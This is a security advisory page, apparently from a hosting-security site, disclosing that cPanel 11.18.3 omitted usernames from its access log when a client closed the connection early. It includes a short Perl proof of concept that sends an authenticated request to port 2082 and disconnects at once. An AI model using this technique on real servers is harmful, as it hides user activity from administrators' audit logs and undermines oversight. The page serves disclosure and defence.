WebhostSecurity.com
ARTICLES
› Lessons Learned - Defense
› Lessons Learned - Offense
› Finding Bugs 1 - Softaculous
› Finding Bugs 2 - cPanel + Horde
› uid/gid Reuse Multi Vendor Issue
› Finding the WordPress 2.1.1 Backdoor
› Discovering Cdorked.A on cPanel
OFFENSE
› AtMail
› BFD
› cPanel
› CSF
› DirectAdmin
› Installatron
› Juniper
› Kloxo
› OSSEC
› Softaculous
› WHMEZLogin
› WHMReseller
DEFENSE
› STFN - Suspicious /tmp File Notifier
› ELM - Exim Log Monitor
› RFID - Remote File Inclusion Detector
› Twitter


cPanel 11.18.3-STABLE_21703 - bypass logging of username to cPanel and WHM


DESCRIPTION

If a user made a request to cPanel or WHM, then immediately closed the connection without waiting for a response, while the request would be logged to /usr/local/cpanel/logs/access_log, the username of the user that made the request would not be included in the log.


#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket::INET;

my $sock = IO::Socket::INET->new(
    PeerAddr => '127.0.0.1',
    PeerPort => '2082',
    Proto    => 'tcp',
    Timeout  => '3',
);

print $sock "GET /frontend/x3/index.html HTTP/1.1\r\n";
print $sock "Host: localhost:2082\r\n";
print $sock "Authorization: Basic $base64_creds\r\n\r\n";
close $sock;


IMPACT

Users could issue requests to cpsrvd that did not contain their username in the logs.


WebhostSecurity.com © 2009 - 2020